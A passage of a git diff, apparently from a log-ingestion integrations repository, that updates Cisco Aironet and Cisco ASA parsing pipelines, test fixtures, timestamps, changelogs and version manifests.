"2023-08-29T10:55:38.289Z", + "@timestamp": "2024-08-29T10:55:38.289Z", "cisco": { "eapol": { "descriptor": 2, @@ -901,7 +901,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:54.242Z", + "@timestamp": "2024-08-29T10:58:54.242Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -938,7 +938,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:19.828Z", + "@timestamp": "2024-08-29T10:58:19.828Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -975,7 +975,7 @@ ] }, { - "@timestamp": "2023-08-29T10:47:25.944Z", + "@timestamp": "2024-08-29T10:47:25.944Z", "ecs": { "version": "8.11.0" }, @@ -1009,7 +1009,7 @@ ] }, { - "@timestamp": "2023-08-29T10:52:56.103Z", + "@timestamp": "2024-08-29T10:52:56.103Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -1046,7 +1046,7 @@ ] }, { - "@timestamp": "2023-08-22T18:14:24.651Z", + "@timestamp": "2024-08-22T18:14:24.651Z", "ecs": { "version": "8.11.0" }, @@ -1077,7 +1077,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:58.000Z", + "@timestamp": "2024-08-29T10:58:58.000Z", "ecs": { "version": "8.11.0" }, @@ -1111,7 +1111,7 @@ ] }, { - "@timestamp": "2023-08-29T10:58:57.787Z", + "@timestamp": "2024-08-29T10:58:57.787Z", "client": { "mac": "DE-FB-48-7C-4F-F7" }, @@ -1148,7 +1148,7 @@ ] }, { - "@timestamp": "2023-08-20T14:55:28.577Z", + "@timestamp": "2024-08-20T14:55:28.577Z", "ecs": { "version": "8.11.0" }, @@ -1182,7 +1182,7 @@ ] }, { - "@timestamp": "2023-08-22T10:24:20.959Z", + "@timestamp": "2024-08-22T10:24:20.959Z", "ecs": { "version": "8.11.0" }, @@ -1214,6 +1214,34 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2024-01-04T17:25:42.866Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "CLIENT_ADDED_TO_RUN_STATE", + "original": "<190>201477: Jan 4 17:25:42.866: %CLIENT_ORCH_LOG-6-CLIENT_ADDED_TO_RUN_STATE: Chassis 2 R0/0: wncd: Username entry (00-00-00-00-00-00) joined with ssid (System-110) for device with MAC: 0000.0000.0000", + "provider": "CLIENT_ORCH_LOG", + "severity": "6" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "message": "Chassis 2 R0/0: wncd: Username entry (00-00-00-00-00-00) joined with ssid (System-110) for device with MAC: 0000.0000.0000", + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_aironet/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_aironet/data_stream/log/elasticsearch/ingest_pipeline/default.yml index b9a65d80a18..c8228d286bd 100644 --- a/packages/cisco_aironet/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_aironet/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -15,6 +15,7 @@ processors: patterns: - "%{SYSLOG_HEADER}:\\s%%{GREEDYDATA:_temp_.full_message}" - "%{SYSLOGFACILITY}%{INT}: AP:%{MAC:host.mac}: \\*%{AIRONET_DATE:_temp_.raw_date}: %%{GREEDYDATA:_temp_.full_message}" + - "%{SYSLOGFACILITY}%{INT}: %{AIRONET_DATE:_temp_.raw_date}: %%{GREEDYDATA:_temp_.full_message}" - "%{SYSLOGFACILITY}%{DATA:host.name}: -%{GREEDYDATA:_temp_.full_message}" pattern_definitions: SYSLOG_HEADER: "%{SYSLOGFACILITY}%{DATA:host.name}:\\s\\*%{DATA:process.name}:\\s%{AIRONET_DATE:_temp_.raw_date}" @@ -36,6 +37,7 @@ processors: ignore_failure: true patterns: - "%{DATA:event.provider}-%{INT:event.severity}-%{DATA:event.action}: %{DATA}:%{INT} %{GREEDYDATA:message}" + - "%{DATA:event.provider}-%{INT:event.severity}-%{DATA:event.action}: %{GREEDYDATA:message}" - grok: field: _temp_.full_message ignore_failure: true diff --git a/packages/cisco_aironet/manifest.yml b/packages/cisco_aironet/manifest.yml index f86769517a3..84a186309e1 100644 --- a/packages/cisco_aironet/manifest.yml +++ b/packages/cisco_aironet/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_aironet title: "Cisco Aironet" -version: "1.12.2" +version: "1.13.1" description: "Integration for Cisco Aironet WLC Logs" type: integration categories: diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml index 209d471e526..485d995ab5d 100644 --- a/packages/cisco_asa/changelog.yml +++ b/packages/cisco_asa/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "2.33.0" + changes: + - description: Improve methods for applying ECS categorizations. + type: enhancement + link: https://github.com/elastic/integrations/pull/9548 +- version: "2.32.1" + changes: + - description: Fix ingest pipeline regex warnings + type: bugfix + link: https://github.com/elastic/integrations/issues/9489 +- version: "2.32.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "2.31.0" + changes: + - description: Add message ids 722022, 722023. + type: enhancement + link: https://github.com/elastic/integrations/pull/9222 - version: "2.30.1" changes: - description: Changed owners diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json index 2e4fea5b89f..446adbb02ba 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "connection_id": "111111111", @@ -89,7 +89,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "connection_id": "111111111", @@ -177,7 +177,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "icmp_code": 3, @@ -245,7 +245,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "source_interface": "net" @@ -261,11 +261,11 @@ ], "code": "609002", "duration": 0, - "end": "2023-05-05T17:51:17.000Z", + "end": "2024-05-05T17:51:17.000Z", "kind": "event", "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00", "severity": 7, - "start": "2023-05-05T17:51:17.000Z", + "start": "2024-05-05T17:51:17.000Z", "timezone": "UTC", "type": [ "connection", @@ -306,7 +306,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "source_interface": "net" @@ -364,7 +364,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "icmp_code": 1, @@ -432,7 +432,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "connection_id": "111111111", @@ -519,7 +519,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "connection_id": "941243214", @@ -599,7 +599,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "fw111" @@ -670,7 +670,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "fw111", @@ -751,7 +751,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "ecs": { "version": "8.11.0" }, @@ -791,7 +791,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -871,7 +871,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -962,7 +962,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -1050,7 +1050,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -1130,7 +1130,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "asa": { "destination_interface": "dstif", @@ -1215,7 +1215,7 @@ ] }, { - "@timestamp": "2023-05-05T18:16:21.000Z", + "@timestamp": "2024-05-05T18:16:21.000Z", "cisco": { "asa": { "icmp_code": 0, @@ -1284,7 +1284,7 @@ ] }, { - "@timestamp": "2023-05-05T18:22:35.000Z", + "@timestamp": "2024-05-05T18:22:35.000Z", "cisco": { "asa": { "source_interface": "net" @@ -1342,7 +1342,7 @@ ] }, { - "@timestamp": "2023-05-05T18:24:31.000Z", + "@timestamp": "2024-05-05T18:24:31.000Z", "cisco": { "asa": { "source_interface": "identity" @@ -1358,11 +1358,11 @@ ], "code": "609002", "duration": 0, - "end": "2023-05-05T18:24:31.000Z", + "end": "2024-05-05T18:24:31.000Z", "kind": "event", "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00", "severity": 7, - "start": "2023-05-05T18:24:31.000Z", + "start": "2024-05-05T18:24:31.000Z", "timezone": "UTC", "type": [ "connection", @@ -1403,7 +1403,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "mapped_source_ip": "81.2.69.144" @@ -1469,7 +1469,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "icmp_code": 3, @@ -1537,7 +1537,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "connection_id": "2960892904", @@ -1560,12 +1560,12 @@ ], "code": "302014", "duration": 0, - "end": "2023-05-05T18:29:32.000Z", + "end": "2024-05-05T18:29:32.000Z", "kind": "event", "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", "reason": "TCP Reset-I", "severity": 6, - "start": "2023-05-05T18:29:32.000Z", + "start": "2024-05-05T18:29:32.000Z", "timezone": "UTC", "type": [ "connection", @@ -1619,7 +1619,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "connection_id": "1588662", @@ -1707,7 +1707,7 @@ ] }, { - "@timestamp": "2023-05-05T18:29:32.000Z", + "@timestamp": "2024-05-05T18:29:32.000Z", "cisco": { "asa": { "destination_interface": "out111", @@ -1729,11 +1729,11 @@ ], "code": "305012", "duration": 0, - "end": "2023-05-05T18:29:32.000Z", + "end": "2024-05-05T18:29:32.000Z", "kind": "event", "original": "May 5 18:29:32 dev01: %ASA-6-305012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00", "severity": 6, - "start": "2023-05-05T18:29:32.000Z", + "start": "2024-05-05T18:29:32.000Z", "timezone": "UTC", "type": [ "connection", @@ -1786,7 +1786,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "icmp_type": 0, @@ -1856,7 +1856,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "destination_interface": "out111", @@ -1931,7 +1931,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "source_interface": "out111" @@ -2003,7 +2003,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "connection_id": "1671727", @@ -2026,11 +2026,11 @@ ], "code": "302016", "duration": 124000000000, - "end": "2023-05-05T18:40:50.000Z", + "end": "2024-05-05T18:40:50.000Z", "kind": "event", "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585", "severity": 2, - "start": "2023-05-05T18:38:46.000Z", + "start": "2024-05-05T18:38:46.000Z", "timezone": "UTC", "type": [ "connection", @@ -2083,7 +2083,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "connection_id": "1743372", @@ -2171,7 +2171,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "connection_id": "1743372", @@ -2259,7 +2259,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "destination_interface": "out111", @@ -2337,7 +2337,7 @@ ] }, { - "@timestamp": "2023-05-05T18:40:50.000Z", + "@timestamp": "2024-05-05T18:40:50.000Z", "cisco": { "asa": { "source_interface": "fw111" @@ -2405,7 +2405,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "source_interface": "fw111" @@ -2477,7 +2477,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "source_interface": "out111" @@ -2548,7 +2548,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "source_interface": "out111" @@ -2619,7 +2619,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "source_interface": "fw111" @@ -2690,7 +2690,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "net", @@ -2765,7 +2765,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "net", @@ -2840,7 +2840,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "net", @@ -2914,7 +2914,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "net", @@ -2936,12 +2936,12 @@ ], "code": "302023", "duration": 0, - "end": "2023-05-05T19:02:58.000Z", + "end": "2024-05-05T19:02:58.000Z", "kind": "event", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner", "reason": "Cluster flow with CLU closed on owner", "severity": 6, - "start": "2023-05-05T19:02:58.000Z", + "start": "2024-05-05T19:02:58.000Z", "timezone": "UTC", "type": [ "info" @@ -2994,7 +2994,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:58.000Z", + "@timestamp": "2024-05-05T19:02:58.000Z", "cisco": { "asa": { "destination_interface": "unknown", @@ -3016,12 +3016,12 @@ ], "code": "302023", "duration": 0, - "end": "2023-05-05T19:02:58.000Z", + "end": "2024-05-05T19:02:58.000Z", "kind": "event", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "reason": "Forwarding or redirect flow removed to create director or backup flow", "severity": 6, - "start": "2023-05-05T19:02:58.000Z", + "start": "2024-05-05T19:02:58.000Z", "timezone": "UTC", "type": [ "info" @@ -3074,7 +3074,7 @@ ] }, { - "@timestamp": "2023-05-05T19:03:27.000Z", + "@timestamp": "2024-05-05T19:03:27.000Z", "cisco": { "asa": { "command_line_arguments": "show access-list fw211111_access_out brief" @@ -3127,7 +3127,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "command_line_arguments": "show access-list aaa_out brief" @@ -3180,7 +3180,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "destination_interface": "fw111", @@ -3258,7 +3258,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "destination_interface": "fw111", @@ -3336,7 +3336,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "ecs": { "version": "8.11.0" }, @@ -3376,7 +3376,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "ecs": { "version": "8.11.0" }, @@ -3416,7 +3416,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "destination_interface": "net" @@ -3487,7 +3487,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "ecs": { "version": "8.11.0" }, @@ -3527,7 +3527,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "ecs": { "version": "8.11.0" }, @@ -3567,7 +3567,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "destination_interface": "fw111", @@ -3642,7 +3642,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { @@ -3695,7 +3695,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "destination_interface": "fw111", @@ -3771,7 +3771,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "destination_interface": "out111", @@ -3846,7 +3846,7 @@ ] }, { - "@timestamp": "2023-04-27T04:18:49.000Z", + "@timestamp": "2024-04-27T04:18:49.000Z", "destination": { "address": "10.20.30.40", "ip": "10.20.30.40" @@ -3905,7 +3905,7 @@ } }, { - "@timestamp": "2023-04-27T04:18:49.000Z", + "@timestamp": "2024-04-27T04:18:49.000Z", "destination": { "address": "10.20.30.40", "ip": "10.20.30.40" @@ -3964,7 +3964,7 @@ } }, { - "@timestamp": "2023-04-27T17:54:52.000Z", + "@timestamp": "2024-04-27T17:54:52.000Z", "destination": { "address": "10.20.30.40", "ip": "10.20.30.40" @@ -4023,7 +4023,7 @@ } }, { - "@timestamp": "2023-04-27T04:18:49.000Z", + "@timestamp": "2024-04-27T04:18:49.000Z", "destination": { "address": "10.20.30.40", "ip": "10.20.30.40" @@ -4082,7 +4082,7 @@ } }, { - "@timestamp": "2023-04-27T04:12:23.000Z", + "@timestamp": "2024-04-27T04:12:23.000Z", "cisco": { "asa": { "connection_id": "2751765169", @@ -4117,12 +4117,12 @@ ], "code": "302304", "duration": 3602000000000, - "end": "2023-04-27T04:12:23.000Z", + "end": "2024-04-27T04:12:23.000Z", "kind": "event", "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "reason": "Connection timeout", "severity": 6, - "start": "2023-04-27T03:12:21.000Z", + "start": "2024-04-27T03:12:21.000Z", "timezone": "UTC", "type": [ "connection", @@ -4187,7 +4187,7 @@ ] }, { - "@timestamp": "2023-04-27T02:02:02.000Z", + "@timestamp": "2024-04-27T02:02:02.000Z", "cisco": { "asa": { "destination_interface": "srv", @@ -4342,7 +4342,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -4388,7 +4388,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "command_line_arguments": "'clear'" @@ -4448,7 +4448,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "privilege": { @@ -4463,7 +4463,7 @@ "event": { "action": "firewall-rule", "category": [ - "network" + "iam" ], "code": "502103", "kind": "event", @@ -4471,7 +4471,8 @@ "severity": 5, "timezone": "UTC", "type": [ - "info" + "group", + "change" ] }, "host": { @@ -4504,7 +4505,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "destination_interface": "FCD-FS-LAN" @@ -4576,7 +4577,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -4634,7 +4635,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "destination_interface": "FCD-FS-LAN" @@ -4708,7 +4709,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -4766,7 +4767,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -4825,7 +4826,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "session_type": "LAN-to-LAN" @@ -4858,12 +4859,12 @@ ], "code": "113019", "duration": 1936000000000, - "end": "2023-04-27T02:03:03.000Z", + "end": "2024-04-27T02:03:03.000Z", "kind": "event", "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "reason": "User Requested", "severity": 4, - "start": "2023-04-27T01:30:47.000Z", + "start": "2024-04-27T01:30:47.000Z", "timezone": "UTC", "type": [ "connection", @@ -4907,7 +4908,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "assigned_ip": "192.168.50.5" @@ -4968,7 +4969,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "webvpn": { @@ -5041,7 +5042,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "webvpn": { @@ -5102,7 +5103,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "destination_interface": "outside" @@ -5288,11 +5289,19 @@ }, "event": { "action": "drop", + "category": [ + "network" + ], "code": "434002", + "kind": "event", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "outcome": "unknown", "severity": 4, - "timezone": "UTC" + "timezone": "UTC", + "type": [ + "connection", + "denied" + ] }, "host": { "hostname": "dev01" @@ -5533,11 +5542,19 @@ }, "event": { "action": "created", + "category": [ + "network" + ], "code": "602303", + "kind": "event", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "outcome": "success", "severity": 6, - "timezone": "UTC" + "timezone": "UTC", + "type": [ + "connection", + "start" + ] }, "host": { "hostname": "dev01" @@ -6140,7 +6157,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -6493,7 +6510,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { @@ -6546,7 +6563,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { @@ -6599,7 +6616,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { @@ -6652,7 +6669,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { @@ -6705,7 +6722,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "aaa_type": "authentication" @@ -6780,7 +6797,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "aaa_type": "authorization" @@ -6855,7 +6872,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "rejection_reason": "AAA failure" @@ -6933,7 +6950,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "ecs": { "version": "8.11.0" }, @@ -6984,7 +7001,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "ecs": { "version": "8.11.0" }, @@ -7035,7 +7052,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "session_type": "admin" @@ -7094,7 +7111,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "session_type": "WebVPN" @@ -7153,7 +7170,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "session_type": "Admin" @@ -7217,7 +7234,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "session_type": "WebVPN" diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log index d9be81e83dc..0eb093b252b 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log @@ -4,6 +4,10 @@ Oct 20 2019 15:42:54: %ASA-4-722037: Group User Aug 6 2020 11:01:37: %ASA-4-722037: Group User IP <234.63.56.32> SVC closing connection: Transport closing. Aug 6 2020 11:01:38: %ASA-4-722051: Group User IP <67.43.156.12> IPv4 Address <67.43.156.12> IPv6 address <::> assigned to session Oct 20 2021 16:41:52: %ASA-4-722011: Group User <464_0273> IP <192.168.0.1> SVC Message: 17/WARNING: Reconnecting the VPN tunnel.. +<190>Jan 24 2024 15:24:40 XYZhost1 : %ASA-6-722022: Group User IP <67.43.156.118> TCP SVC connection established without compression +<190>Jan 24 2024 15:25:23 XYZhost1 : %ASA-6-722023: Group User IP <81.2.69.142> UDP SVC connection terminated without compression +<190>Feb 21 2024 09:53:46 xxxxxx : %ASA-6-722022: Group MY-MFA User myuser@email.com IP 192.168.0.12 UDP SVC connection established without compression +<190>Feb 21 2024 09:55:01 xxxxxx: %ASA-6-722023: Group MGMT_Tunnel User my123.org.com IP 192.168.0.228 UDP SVC connection terminated without compression Oct 20 2021 16:41:52: %ASA-4-722033: Group User 